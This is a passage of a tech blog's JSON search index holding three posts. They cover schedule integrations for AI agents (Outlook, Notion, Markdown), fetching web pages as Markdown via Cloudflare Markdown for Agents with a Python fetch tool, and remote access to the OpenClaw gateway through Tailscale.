~/.config/outlook/config.py\u0026#34;) sys.exit(1) def get_token(): \u0026#34;\u0026#34;\u0026#34;Get a delegated access token via the device code flow\u0026#34;\u0026#34;\u0026#34; # The delegated permissions from Step 4 require a signed-in user; an app-only # (client credentials) token cannot call /me, and that flow is unavailable with # the \u0026#39;common\u0026#39; authority anyway. Requires \u0026#34;Allow public client flows\u0026#34; = Yes # under Authentication in the Azure portal. authority = f\u0026#34;https://login.microsoftonline.com/{TENANT_ID}\u0026#34; app = msal.PublicClientApplication(CLIENT_ID, authority=authority) scopes = [\u0026#34;Calendars.Read\u0026#34;, \u0026#34;Tasks.Read\u0026#34;] result = None accounts = app.get_accounts() if accounts: # Reuse a cached token when possible result = app.acquire_token_silent(scopes, account=accounts[0]) if not result: flow = app.initiate_device_flow(scopes=scopes) print(flow[\u0026#34;message\u0026#34;]) # Visit the URL shown and enter the code result = app.acquire_token_by_device_flow(flow) if \u0026#34;access_token\u0026#34; in result: return result[\u0026#34;access_token\u0026#34;] print(f\u0026#34;Auth failed: {result.get(\u0026#39;error_description\u0026#39;)}\u0026#34;) return None def get_calendar_events(): \u0026#34;\u0026#34;\u0026#34;Get calendar events\u0026#34;\u0026#34;\u0026#34; token = get_token() if not token: return \u0026#34; ⚠️ Auth failed\u0026#34; headers = {\u0026#39;Authorization\u0026#39;: f\u0026#39;Bearer {token}\u0026#39;} now = datetime.now() start = 
now.replace(hour=0, minute=0, second=0).isoformat() end = (now + timedelta(days=1)).replace(hour=0, minute=0, second=0).isoformat() url = \u0026#34;https://graph.microsoft.com/v1.0/me/calendar/calendarView\u0026#34; params = { \u0026#39;startDateTime\u0026#39;: start, \u0026#39;endDateTime\u0026#39;: end, \u0026#39;$select\u0026#39;: \u0026#39;subject,start,end\u0026#39; } try: response = requests.get(url, headers=headers, params=params) events = response.json().get(\u0026#39;value\u0026#39;, []) if not events: return \u0026#34; • No events\u0026#34; lines = [] for event in events: start_time = event[\u0026#39;start\u0026#39;][\u0026#39;dateTime\u0026#39;][:16].replace(\u0026#39;T\u0026#39;, \u0026#39; \u0026#39;) lines.append(f\u0026#34; • {start_time} {event[\u0026#39;subject\u0026#39;]}\u0026#34;) return \u0026#39;\\n\u0026#39;.join(lines) except Exception as e: return f\u0026#34; ⚠️ Failed: {str(e)[:40]}\u0026#34; if __name__ == \u0026#39;__main__\u0026#39;: print(\u0026#34;📅 **Today\u0026#39;s Schedule**\u0026#34;) print(get_calendar_events()) Solution 3: Notion Who It\u0026rsquo;s For Already use Notion for knowledge/project management Like flexible database structures Need to manage tasks and schedules together Key Advantages Simplest setup - Done in 5 minutes Visual editing - Table view is intuitive All-in-one - Schedules, tasks, notes together Good China stability - Notion works in China Main Drawbacks Requires manual maintenance - Can\u0026rsquo;t auto-sync like calendars Limited features - No recurring events like professional calendars Setup from Scratch Step 1: Create Notion Integration Visit Notion Integrations Click New integration Fill in: Name: AI Schedule Associated workspace: Select your workspace Click Submit, copy Internal Integration Token (secret_xxx) Step 2: Create Schedule Database Create a page in Notion, add Database (table view) Add properties: Name (Title) - Event/task title Date (Date) - Event date Time (Text, optional) - Specific time 
Type (Select, optional) - Event/Task Step 3: Share Database Open database page, click Share top right Click Invite, select your Integration Permission: Can read Step 4: Get Database ID Copy from browser address bar:\nhttps://www.notion.so/abc123def456?v=... ^^^^^^^^^^^^ This is Database ID Step 5: Place Credentials Create config file ~/.config/notion/config.py:\nNOTION_TOKEN = \u0026#39;secret_xxx-your-token\u0026#39; DATABASE_ID = \u0026#39;abc123-your-database-id\u0026#39; DATE_PROPERTY = \u0026#39;Date\u0026#39; TITLE_PROPERTY = \u0026#39;Name\u0026#39; Step 6: Python Code # Install dependencies pip3 install --user requests Create get_notion_schedule.py:\n#!/usr/bin/env python3 \u0026#34;\u0026#34;\u0026#34;Notion Schedule Retrieval\u0026#34;\u0026#34;\u0026#34; import os import sys from datetime import datetime sys.path.insert(0, os.path.expanduser(\u0026#39;~/.config/notion\u0026#39;)) try: import requests except ImportError: print(\u0026#34;Please install: pip3 install --user requests\u0026#34;) sys.exit(1) try: from config import NOTION_TOKEN, DATABASE_ID, DATE_PROPERTY, TITLE_PROPERTY except ImportError: print(\u0026#34;Please create ~/.config/notion/config.py\u0026#34;) sys.exit(1) def get_today_schedule(): \u0026#34;\u0026#34;\u0026#34;Get today\u0026#39;s schedule\u0026#34;\u0026#34;\u0026#34; headers = { \u0026#39;Authorization\u0026#39;: f\u0026#39;Bearer {NOTION_TOKEN}\u0026#39;, \u0026#39;Notion-Version\u0026#39;: \u0026#39;2022-06-28\u0026#39;, \u0026#39;Content-Type\u0026#39;: \u0026#39;application/json\u0026#39; } today = datetime.now().strftime(\u0026#39;%Y-%m-%d\u0026#39;) url = f\u0026#34;https://api.notion.com/v1/databases/{DATABASE_ID}/query\u0026#34; data = { \u0026#34;filter\u0026#34;: { \u0026#34;property\u0026#34;: DATE_PROPERTY, \u0026#34;date\u0026#34;: {\u0026#34;equals\u0026#34;: today} }, \u0026#34;sorts\u0026#34;: [{\u0026#34;property\u0026#34;: DATE_PROPERTY, \u0026#34;direction\u0026#34;: \u0026#34;ascending\u0026#34;}] } try: 
response = requests.post(url, headers=headers, json=data) results = response.json().get(\u0026#39;results\u0026#39;, []) if not results: return \u0026#34; • No schedule\u0026#34; lines = [] for item in results: props = item[\u0026#39;properties\u0026#39;] title = props[TITLE_PROPERTY][\u0026#39;title\u0026#39;][0][\u0026#39;text\u0026#39;][\u0026#39;content\u0026#39;] if props[TITLE_PROPERTY][\u0026#39;title\u0026#39;] else \u0026#39;Untitled\u0026#39; lines.append(f\u0026#34; • {title}\u0026#34;) return \u0026#39;\\n\u0026#39;.join(lines) except Exception as e: return f\u0026#34; ⚠️ Failed: {str(e)[:40]}\u0026#34; if __name__ == \u0026#39;__main__\u0026#39;: print(\u0026#34;📅 **Today\u0026#39;s Schedule**\u0026#34;) print(get_today_schedule()) Solution 4: Local Markdown File Who It\u0026rsquo;s For Privacy is top priority Don\u0026rsquo;t need multi-device sync Want the simplest solution to get started Key Advantages Fully offline - No external services Zero configuration - Create file and go Version control - Can use Git for history Setup from Scratch Create ~/.openclaw/schedule.md:\n# Schedule Management ## 2026-03-10 - [ ] 09:00 Morning meeting - [ ] 14:00 Project review - [ ] 20:00 Workout ## 2026-03-11 - [ ] 10:00 Client call Python code to read:\n#!/usr/bin/env python3 \u0026#34;\u0026#34;\u0026#34;Local Markdown Schedule Reader\u0026#34;\u0026#34;\u0026#34; import os import re from datetime import datetime def get_schedule(): schedule_file = os.path.expanduser(\u0026#39;~/.openclaw/schedule.md\u0026#39;) if not os.path.exists(schedule_file): return \u0026#34; • Schedule file not created\u0026#34; today = datetime.now().strftime(\u0026#39;%Y-%m-%d\u0026#39;) with open(schedule_file, \u0026#39;r\u0026#39;, encoding=\u0026#39;utf-8\u0026#39;) as f: content = f.read() # Find today\u0026#39;s schedule pattern = rf\u0026#39;## {today}\\n(.*?)(?=\\n## |\\Z)\u0026#39; match = re.search(pattern, content, re.DOTALL) if not match: return \u0026#34; • No schedule 
today\u0026#34; tasks = match.group(1).strip() lines = [line.strip() for line in tasks.split(\u0026#39;\\n\u0026#39;) if line.strip()] return \u0026#39;\\n\u0026#39;.join(lines) if lines else \u0026#34; • No schedule\u0026#34; if __name__ == \u0026#39;__main__\u0026#39;: print(\u0026#34;📅 **Today\u0026#39;s Schedule**\u0026#34;) print(get_schedule()) Solution Comparison Summary Network Stability (China Environment) Solution Access Speed Reliability Notes Google Calendar ⚠️ Slow ❌ Needs VPN Calendar + Tasks dual functionality, AI can read/write Outlook/365 ✅ Fast ✅ Stable Microsoft China CDN Notion ✅ Fast ✅ Stable Flexible database Markdown ✅ Local ✅ Perfect Completely offline AI Agent Autonomy Comparison Solution AI Can Read AI Can Create Setup Complexity Google Calendar ✅ ✅ ⭐⭐⭐ Hybrid auth required Outlook ✅ ✅ ⭐⭐ Azure config required Notion ✅ ✅ ⭐ Simple API Markdown ✅ ✅ ⭐ Local file operations Recommended Choice If you are\u0026hellip;\nOverseas user, need full Google ecosystem → Google Calendar (Service Account for calendar + OAuth for tasks hybrid) Enterprise/student with Microsoft account → Outlook (most stable in China) Already use Notion for everything → Notion Database (all-in-one) Minimalist/privacy-first → Markdown (simplest) Resources Google Calendar API Docs Google Tasks API Docs Microsoft Graph API Calendar Docs Notion API Docs Choose the solution that fits you best, and evolve your AI assistant from \u0026ldquo;can only answer\u0026rdquo; to \u0026ldquo;can proactively help manage your time.\u0026rdquo;\n","permalink":"https://www.d5n.xyz/en/posts/ai-schedule-solutions-comparison/","summary":"\u003ch2 id=\"why-do-ai-agents-need-schedule-management\"\u003eWhy Do AI Agents Need Schedule Management?\u003c/h2\u003e\n\u003cp\u003eWhen you ask your AI agent \u0026ldquo;What\u0026rsquo;s on my schedule today?\u0026rdquo; or \u0026ldquo;Create a meeting for tomorrow at 3 PM,\u0026rdquo; it should execute accurately, not say \u0026ldquo;I don\u0026rsquo;t 
know.\u0026rdquo;\u003c/p\u003e\n\u003cp\u003eA complete AI agent schedule system should have:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e📅 \u003cstrong\u003eRead schedules\u003c/strong\u003e - Know what\u0026rsquo;s happening today and tomorrow\u003c/li\u003e\n\u003cli\u003e⏰ \u003cstrong\u003eTimely reminders\u003c/strong\u003e - Push notifications at the right time\u003c/li\u003e\n\u003cli\u003e📝 \u003cstrong\u003eTask tracking\u003c/strong\u003e - Manage to-do items and completion status\u003c/li\u003e\n\u003cli\u003e🤖 \u003cstrong\u003eProactive creation\u003c/strong\u003e - AI can create new events and tasks for you\u003c/li\u003e\n\u003cli\u003e🔄 \u003cstrong\u003eMulti-device sync\u003c/strong\u003e - Accessible from phone, computer, and AI assistant\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eBut choosing the right solution isn\u0026rsquo;t easy—\u003cstrong\u003enetwork environment, configuration complexity, and usage habits\u003c/strong\u003e all affect the decision.\u003c/p\u003e","title":"AI Agent Schedule Management: Comparing Google, Outlook, Notion, and Local Solutions"},{"content":"The Problem: Pain Points of AI Web Scraping When you ask an AI Agent to fetch web content, you typically encounter these issues:\nToo much HTML noise - Navigation bars, ads, sidebars, scripts, styles\u0026hellip; Massive token consumption - 2,000 words of content might require 15,000+ tokens of HTML Difficult parsing - AI needs to extract useful info from complex HTML High costs - With token-based pricing, this directly means money Cloudflare Markdown for Agents was created to solve this problem.\nWhat is Cloudflare Markdown for Agents? Launched by Cloudflare in February 2026, this feature automatically converts HTML to Markdown when AI Agents scrape websites that have it enabled.\nHow Significant is the Effect? 
According to Cloudflare\u0026rsquo;s official data:\nA blog post in HTML format: ~16,180 tokens Converted to Markdown: only ~3,150 tokens ~80% reduction in token consumption How It Works When an AI Agent sends an HTTP request with this header:\nAccept: text/markdown If the website has Cloudflare Markdown for Agents enabled, Cloudflare converts the HTML to Markdown at the edge and returns it to the AI Agent.\nThe returned content:\n✅ Automatically removes HTML tags, CSS, JavaScript ✅ Preserves semantic structure (headings, lists, links, etc.) ✅ Easier for AI to parse, less noise ✅ Significantly reduces token consumption Practical: How to Make AI Agents Fetch Markdown Format Regardless of whether the target website has Cloudflare Markdown for Agents enabled, you can optimize your scraping using the following methods.\nMethod 1: Request Markdown Format (If Supported) The simplest approach is to declare in the HTTP request header that you accept Markdown format:\nimport requests headers = { \u0026#39;Accept\u0026#39;: \u0026#39;text/markdown, text/html;q=0.8\u0026#39; } response = requests.get(\u0026#39;https://example.com/article/\u0026#39;, headers=headers) # Check the returned content type if \u0026#39;markdown\u0026#39; in response.headers.get(\u0026#39;Content-Type\u0026#39;, \u0026#39;\u0026#39;): print(\u0026#34;✅ Got Markdown format\u0026#34;) content = response.text else: print(\u0026#34;ℹ️ Got HTML, needs conversion\u0026#34;) content = html_to_markdown(response.text) Check if website supports it:\nIf the returned Content-Type contains text/markdown, it\u0026rsquo;s supported Currently, not many websites support this, but the number is growing Method 2: Try Markdown Version URLs Some websites actively provide Markdown versions, typically with these URL patterns:\nhttps://example.com/posts/article-title/index.md https://example.com/posts/article-title.md https://example.com/api/content/article-title?format=md Scraping strategy:\nFirst try URLs with .md or 
/index.md suffix If not found, fall back to regular HTML scraping Convert HTML to Markdown Method 3: Use the Smart Fetch Tool I\u0026rsquo;ve written a complete tool that automates the above workflow:\nsmart_fetch.py core features:\nPrioritizes Markdown format requests Automatically detects return type If HTML is returned, automatically converts to Markdown Extracts main content, removes navigation and ads Complete source code:\n#!/usr/bin/env python3 \u0026#34;\u0026#34;\u0026#34; Smart Fetch - Intelligent Web Scraping Tool Supports Cloudflare Markdown for Agents Auto-detects and handles Markdown/HTML responses \u0026#34;\u0026#34;\u0026#34; import sys import urllib.request import urllib.error from html.parser import HTMLParser import re class HTMLToMarkdown(HTMLParser): \u0026#34;\u0026#34;\u0026#34;HTML to Markdown converter\u0026#34;\u0026#34;\u0026#34; def __init__(self): super().__init__() self.result = [] self.in_script = False self.in_style = False self.skip_tags = {\u0026#39;script\u0026#39;, \u0026#39;style\u0026#39;, \u0026#39;nav\u0026#39;, \u0026#39;header\u0026#39;, \u0026#39;footer\u0026#39;, \u0026#39;aside\u0026#39;} def handle_starttag(self, tag, attrs): if tag in (\u0026#39;script\u0026#39;, \u0026#39;style\u0026#39;): self.in_script = tag == \u0026#39;script\u0026#39; self.in_style = tag == \u0026#39;style\u0026#39; elif tag in self.skip_tags: pass elif tag == \u0026#39;h1\u0026#39;: self.result.append(\u0026#39;\\n# \u0026#39;) elif tag == \u0026#39;h2\u0026#39;: self.result.append(\u0026#39;\\n## \u0026#39;) elif tag == \u0026#39;h3\u0026#39;: self.result.append(\u0026#39;\\n### \u0026#39;) elif tag == \u0026#39;h4\u0026#39;: self.result.append(\u0026#39;\\n#### \u0026#39;) elif tag == \u0026#39;p\u0026#39;: self.result.append(\u0026#39;\\n\u0026#39;) elif tag == \u0026#39;br\u0026#39;: self.result.append(\u0026#39;\\n\u0026#39;) elif tag == \u0026#39;a\u0026#39;: attrs_dict = dict(attrs) if \u0026#39;href\u0026#39; in attrs_dict: 
self.link_href = attrs_dict[\u0026#39;href\u0026#39;] self.result.append(\u0026#39;[\u0026#39;) elif tag == \u0026#39;img\u0026#39;: attrs_dict = dict(attrs) alt = attrs_dict.get(\u0026#39;alt\u0026#39;, \u0026#39;\u0026#39;) src = attrs_dict.get(\u0026#39;src\u0026#39;, \u0026#39;\u0026#39;) if src: self.result.append(f\u0026#39;![{alt}]({src})\u0026#39;) elif tag in (\u0026#39;ul\u0026#39;, \u0026#39;ol\u0026#39;): self.result.append(\u0026#39;\\n\u0026#39;) elif tag == \u0026#39;li\u0026#39;: self.result.append(\u0026#39;- \u0026#39;) elif tag in (\u0026#39;strong\u0026#39;, \u0026#39;b\u0026#39;): self.result.append(\u0026#39;**\u0026#39;) elif tag in (\u0026#39;em\u0026#39;, \u0026#39;i\u0026#39;): self.result.append(\u0026#39;*\u0026#39;) elif tag == \u0026#39;code\u0026#39;: self.result.append(\u0026#39;`\u0026#39;) elif tag == \u0026#39;pre\u0026#39;: self.result.append(\u0026#39;\\n```\\n\u0026#39;) def handle_endtag(self, tag): if tag == \u0026#39;script\u0026#39;: self.in_script = False elif tag == \u0026#39;style\u0026#39;: self.in_style = False elif tag in self.skip_tags: pass elif tag in (\u0026#39;h1\u0026#39;, \u0026#39;h2\u0026#39;, \u0026#39;h3\u0026#39;, \u0026#39;h4\u0026#39;, \u0026#39;p\u0026#39;, \u0026#39;li\u0026#39;): self.result.append(\u0026#39;\\n\u0026#39;) elif tag == \u0026#39;a\u0026#39;: self.result.append(f\u0026#39;]({getattr(self, \u0026#34;link_href\u0026#34;, \u0026#34;\u0026#34;)})\u0026#39;) elif tag in (\u0026#39;strong\u0026#39;, \u0026#39;b\u0026#39;): self.result.append(\u0026#39;**\u0026#39;) elif tag in (\u0026#39;em\u0026#39;, \u0026#39;i\u0026#39;): self.result.append(\u0026#39;*\u0026#39;) elif tag == \u0026#39;code\u0026#39;: self.result.append(\u0026#39;`\u0026#39;) elif tag == \u0026#39;pre\u0026#39;: self.result.append(\u0026#39;\\n```\\n\u0026#39;) def handle_data(self, data): if self.in_script or self.in_style: return text = data.strip() if text: self.result.append(text) def get_markdown(self): return
\u0026#39;\u0026#39;.join(self.result) def smart_fetch(url, max_chars=5000): \u0026#34;\u0026#34;\u0026#34;Smart web content fetching\u0026#34;\u0026#34;\u0026#34; headers = { \u0026#39;User-Agent\u0026#39;: \u0026#39;Mozilla/5.0 (compatible; AI-Agent/1.0; +https://www.d5n.xyz)\u0026#39;, \u0026#39;Accept\u0026#39;: \u0026#39;text/markdown, text/plain;q=0.9, text/html;q=0.8\u0026#39;, \u0026#39;Accept-Language\u0026#39;: \u0026#39;en-US,en;q=0.9\u0026#39;, \u0026#39;Accept-Encoding\u0026#39;: \u0026#39;identity\u0026#39;, \u0026#39;Connection\u0026#39;: \u0026#39;keep-alive\u0026#39;, } try: req = urllib.request.Request(url, headers=headers, method=\u0026#39;GET\u0026#39;) with urllib.request.urlopen(req, timeout=30) as response: content_type = response.headers.get(\u0026#39;Content-Type\u0026#39;, \u0026#39;\u0026#39;).lower() raw_data = response.read() try: content = raw_data.decode(\u0026#39;utf-8\u0026#39;) except UnicodeDecodeError: try: content = raw_data.decode(\u0026#39;gbk\u0026#39;) except: content = raw_data.decode(\u0026#39;utf-8\u0026#39;, errors=\u0026#39;ignore\u0026#39;) if \u0026#39;markdown\u0026#39; in content_type: print(f\u0026#34;✅ Got Markdown format\u0026#34;, file=sys.stderr) return content[:max_chars] if \u0026#39;text/plain\u0026#39; in content_type: return content[:max_chars] print(f\u0026#34;🔄 Got HTML, converting to Markdown\u0026#34;, file=sys.stderr) converter = HTMLToMarkdown() body_match = re.search(r\u0026#39;\u0026lt;body[^\u0026gt;]*\u0026gt;(.*?)\u0026lt;/body\u0026gt;\u0026#39;, content, re.DOTALL | re.IGNORECASE) if body_match: body_content = body_match.group(1) else: body_content = content converter.feed(body_content) markdown = converter.get_markdown() markdown = re.sub(r\u0026#39;\\n{3,}\u0026#39;, \u0026#39;\\n\\n\u0026#39;, markdown) return markdown[:max_chars] except Exception as e: return f\u0026#34;❌ Error: {str(e)}\u0026#34; if __name__ == \u0026#34;__main__\u0026#34;: if len(sys.argv) \u0026lt; 2: 
print(\u0026#34;Usage: python3 smart_fetch.py \u0026lt;URL\u0026gt; [max_chars]\u0026#34;) sys.exit(1) url = sys.argv[1] max_chars = int(sys.argv[2]) if len(sys.argv) \u0026gt; 2 else 5000 print(smart_fetch(url, max_chars)) Usage examples:\n# Fetch web page, auto-handle Markdown/HTML python3 smart_fetch.py \u0026#34;https://example.com/article/\u0026#34; # Limit returned characters python3 smart_fetch.py \u0026#34;https://example.com/article/\u0026#34; 3000 Advanced: Search + Fetch Integration In practice, you usually need to search first, then fetch detailed content. I\u0026rsquo;ve combined SearXNG search and Smart Fetch into a complete tool chain.\nsearch_and_fetch.py complete source code:\n#!/usr/bin/env python3 \u0026#34;\u0026#34;\u0026#34; SearXNG + Smart Fetch combo tool Search first, then intelligently fetch detailed content \u0026#34;\u0026#34;\u0026#34; import sys import urllib.request import urllib.error import urllib.parse import json import subprocess import os SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__)) SEARXNG_URL = \u0026#34;http://localhost:8888\u0026#34; def searxng_search(query, num_results=5): \u0026#34;\u0026#34;\u0026#34;Search using SearXNG\u0026#34;\u0026#34;\u0026#34; try: url = f\u0026#34;{SEARXNG_URL}/search?q={urllib.parse.quote(query)}\u0026amp;format=json\u0026#34; req = urllib.request.Request(url, headers={ \u0026#39;User-Agent\u0026#39;: \u0026#39;Mozilla/5.0 (compatible; AI-Agent/1.0)\u0026#39; }) with urllib.request.urlopen(req, timeout=30) as response: data = json.loads(response.read().decode(\u0026#39;utf-8\u0026#39;)) return data.get(\u0026#39;results\u0026#39;, [])[:num_results] except Exception as e: print(f\u0026#34;❌ Search failed: {e}\u0026#34;, file=sys.stderr) return [] def smart_fetch(url, max_chars=3000): \u0026#34;\u0026#34;\u0026#34;Call smart_fetch.py to get content\u0026#34;\u0026#34;\u0026#34; try: result = subprocess.run( [\u0026#39;python3\u0026#39;, os.path.join(SCRIPT_DIR, 
\u0026#39;smart_fetch.py\u0026#39;), url, str(max_chars)], capture_output=True, text=True, timeout=30 ) return result.stdout except Exception as e: return f\u0026#34;❌ Fetch failed: {e}\u0026#34; def main(): if len(sys.argv) \u0026lt; 2: print(\u0026#34;\u0026#34;\u0026#34;Usage: python3 search_and_fetch.py \u0026#34;query\u0026#34; [num_results] [brief|full] Options: num_results - Number of search results (default: 5) fetch_depth - brief (summary) | full (complete) (default: brief) Examples: python3 search_and_fetch.py \u0026#34;OpenClaw tutorial\u0026#34; python3 search_and_fetch.py \u0026#34;AI news\u0026#34; 3 full \u0026#34;\u0026#34;\u0026#34;) sys.exit(1) query = sys.argv[1] num_results = int(sys.argv[2]) if len(sys.argv) \u0026gt; 2 else 5 fetch_depth = sys.argv[3] if len(sys.argv) \u0026gt; 3 else \u0026#39;brief\u0026#39; print(f\u0026#34;🔍 Searching: {query}\\n\u0026#34;) # 1. Search results = searxng_search(query, num_results) if not results: print(\u0026#34;No results found\u0026#34;) sys.exit(1) # 2. Fetch details for i, result in enumerate(results, 1): title = result.get(\u0026#39;title\u0026#39;, \u0026#39;No title\u0026#39;) url = result.get(\u0026#39;url\u0026#39;, \u0026#39;\u0026#39;) content = result.get(\u0026#39;content\u0026#39;, \u0026#39;\u0026#39;) print(f\u0026#34;\\n{\u0026#39;=\u0026#39;*60}\u0026#34;) print(f\u0026#34;{i}. 
{title}\u0026#34;) print(f\u0026#34; URL: {url}\u0026#34;) print(f\u0026#34;{\u0026#39;=\u0026#39;*60}\\n\u0026#34;) if content: print(f\u0026#34;📄 Summary: {content[:200]}...\u0026#34;) if fetch_depth == \u0026#39;full\u0026#39; and url: print(f\u0026#34;\\n🔄 Fetching full content...\u0026#34;) detail = smart_fetch(url, 3000) print(f\u0026#34;\\n📄 Full content:\\n{detail[:1500]}...\u0026#34;) print() if __name__ == \u0026#34;__main__\u0026#34;: main() Usage:\n# Search and get summaries ./search-and-fetch.sh \u0026#34;OpenClaw tutorial\u0026#34; 5 brief # Search and fetch full articles ./search-and-fetch.sh \u0026#34;AI safety research\u0026#34; 3 full For setting up SearXNG search, check out my previous post:\nSearch Solutions for AI Agents: SearXNG vs. Tavily vs. Custom Real-World Impact Test Scenario: Scraping a Technical Blog Post Method Content-Type Token Count Effect Regular HTML text/html ~5,000 Contains navigation, styles, noise Markdown format text/markdown ~1,000 Only main content Savings - ~80% ✅ Significant optimization Benefits for AI Agents Lower costs - 60-80% reduction in token consumption Faster processing - Less content to parse Better accuracy - Reduced HTML noise interference Longer context - Same context window can hold more content Appendix: Making Your Website Support Markdown Format If you want your own website to support Markdown for Agents, here are implementation methods.\nExample: Hugo Configure in hugo.toml:\n[outputs] page = [\u0026#34;HTML\u0026#34;, \u0026#34;Markdown\u0026#34;] [outputFormats.Markdown] mediatype = \u0026#34;text/markdown\u0026#34; baseName = \u0026#34;index\u0026#34; isPlainText = true Create layouts/_default/single.md template:\n--- title: \u0026#34;{{ .Title }}\u0026#34; date: {{ .Date }} --- {{ .RawContent }} After building, each post generates both index.html and index.md.\nFor Other Platforms WordPress: Use plugins to generate Markdown versions Next.js/Gatsby: Generate .md files at build time 
Docusaurus/VitePress: Markdown source files, provide direct access Custom systems: Write both HTML and Markdown when publishing Summary Key Points Request headers are key - Use Accept: text/markdown to request Markdown format Try Markdown URLs - Some websites provide /index.md direct access Auto-conversion fallback - Use Smart Fetch tool for automatic HTML→Markdown conversion Integrated tools for efficiency - Search+fetch integration, complete workflow Applicable Scenarios ✅ AI assistant real-time Q\u0026amp;A (needs to fetch external sources) ✅ Content aggregation and analysis (batch processing articles) ✅ Automated monitoring (regular update checks) ✅ Research assistance (quick access to clean content) Resources Cloudflare Markdown for Agents docs Hugo Configure Outputs Search Solutions Comparison Complete source code examples available on GitHub. Feedback welcome!\n","permalink":"https://www.d5n.xyz/en/posts/markdown-for-agents-guide/","summary":"\u003ch2 id=\"the-problem-pain-points-of-ai-web-scraping\"\u003eThe Problem: Pain Points of AI Web Scraping\u003c/h2\u003e\n\u003cp\u003eWhen you ask an AI Agent to fetch web content, you typically encounter these issues:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eToo much HTML noise\u003c/strong\u003e - Navigation bars, ads, sidebars, scripts, styles\u0026hellip;\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eMassive token consumption\u003c/strong\u003e - 2,000 words of content might require 15,000+ tokens of HTML\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eDifficult parsing\u003c/strong\u003e - AI needs to extract useful info from complex HTML\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHigh costs\u003c/strong\u003e - With token-based pricing, this directly means money\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eCloudflare Markdown for Agents\u003c/strong\u003e was created to solve this problem.\u003c/p\u003e","title":"Leveraging Cloudflare Markdown for Agents: Optimize 
AI Content Fetching"},{"content":"Introduction OpenClaw Gateway runs locally by default (127.0.0.1:18789), which means:\n✅ Secure: No external access ❌ Limited: Can only be used locally If you want to:\nRun OpenClaw on your home server and access it remotely from your phone Share an OpenClaw instance with your team Use your home AI assistant while away Then Tailscale integration is your best choice.\nWhat is Tailscale? Tailscale is a zero-config VPN tool based on WireGuard. It lets you easily build a private network (Tailnet) and securely connect any devices.\nKey Benefits Feature Description Zero Config No firewall rules or port forwarding needed End-to-End Encryption WireGuard protocol, secure and reliable Cross-Platform Linux, macOS, Windows, iOS, Android Free Tier Free for personal use, up to 20 devices Two Tailscale Modes OpenClaw supports two Tailscale modes:\ntailscale serve - Tailnet-only access (private) tailscale funnel - Public internet access (requires password) What Can OpenClaw + Tailscale Do? 
Scenario 1: Tailscale Serve (Recommended for Personal Use) Use Cases:\nRun OpenClaw on home NAS/server Access remotely from phone/laptop via Tailscale Only your devices can access Network Topology:\n[Phone] ←──Tailnet──→ [Tailscale] ←──localhost──→ [OpenClaw Gateway] [Laptop] ←──Encrypted Tunnel──→ 192.168.x.x:18789 Scenario 2: Tailscale Funnel (Public Access) Use Cases:\nTeam collaboration, sharing one OpenClaw instance Temporary access from devices without Tailscale Access via public URL (e.g., https://your-machine.tailnet-xx.ts.net) ⚠️ Security Warning:\nFunnel exposes your service to the public internet Password authentication is mandatory, otherwise anyone can access your Gateway Recommended: gateway.auth.mode: \u0026quot;password\u0026quot; Configuration Steps Prerequisites Install Tailscale\n# Debian/Ubuntu curl -fsSL https://tailscale.com/install.sh | sh # macOS brew install tailscale Login to Tailscale\nsudo tailscale up # Follow browser prompts to authorize Verify Tailscale IP\ntailscale ip -4 # Output: 100.x.y.z Configure OpenClaw Edit ~/.openclaw/openclaw.json:\nOption A: Tailscale Serve (Private) { \u0026#34;gateway\u0026#34;: { \u0026#34;port\u0026#34;: 18789, \u0026#34;mode\u0026#34;: \u0026#34;tailscale\u0026#34;, \u0026#34;auth\u0026#34;: { \u0026#34;mode\u0026#34;: \u0026#34;token\u0026#34;, \u0026#34;token\u0026#34;: \u0026#34;your-secure-token\u0026#34; }, \u0026#34;tailscale\u0026#34;: { \u0026#34;mode\u0026#34;: \u0026#34;serve\u0026#34;, \u0026#34;resetOnExit\u0026#34;: false } } } Access: Only devices with Tailscale on the same account\nOption B: Tailscale Funnel (Public) { \u0026#34;gateway\u0026#34;: { \u0026#34;port\u0026#34;: 18789, \u0026#34;mode\u0026#34;: \u0026#34;tailscale\u0026#34;, \u0026#34;auth\u0026#34;: { \u0026#34;mode\u0026#34;: \u0026#34;password\u0026#34;, \u0026#34;password\u0026#34;: \u0026#34;your-strong-password\u0026#34; }, \u0026#34;tailscale\u0026#34;: { \u0026#34;mode\u0026#34;: \u0026#34;funnel\u0026#34;, 
\u0026#34;resetOnExit\u0026#34;: true } } } ⚠️ Password is mandatory for Funnel mode!\nRestart Gateway openclaw gateway restart Security Best Practices Prefer Serve Mode - Unless you need public access Use Strong Passwords for Funnel openssl rand -base64 32 Enable resetOnExit for Funnel Rotate tokens/passwords regularly FAQ Q: What\u0026rsquo;s the difference between local and Tailscale modes?\nFeature Local Tailscale Serve Tailscale Funnel Access Local only Tailnet devices Public internet Encryption None WireGuard WireGuard + TLS Needs Tailscale No Yes Yes Password Optional Optional Required Q: Can I use both local and Tailscale?\nNo. Gateway can only bind to one mode. Use Tailscale Serve + install Tailscale on local devices.\nQ: How do I find my Tailscale hostname?\ntailscale status Example output:\n100.x.x.x your-hostname your@email.com linux - The your-hostname column is what you need.\nOr directly:\ntailscale ip -4 --hostname Customize hostname:\n# On first login sudo tailscale up --hostname=my-openclaw-server # Or rename in Tailscale admin console: # https://login.tailscale.com/admin/machines Summary Need Recommended Local only bind: loopback (default) Multi-device private tailscale: serve Team/public tailscale: funnel + password Tailscale makes OpenClaw remote access simple and secure—no firewall configuration, no port forwarding, deployed in minutes.\nReferences:\nTailscale Docs OpenClaw Gateway Config ","permalink":"https://www.d5n.xyz/en/posts/openclaw-tailscale-guide/","summary":"\u003ch2 id=\"introduction\"\u003eIntroduction\u003c/h2\u003e\n\u003cp\u003eOpenClaw Gateway runs locally by default (\u003ccode\u003e127.0.0.1:18789\u003c/code\u003e), which means:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e✅ Secure: No external access\u003c/li\u003e\n\u003cli\u003e❌ Limited: Can only be used locally\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eIf you want to:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eRun OpenClaw 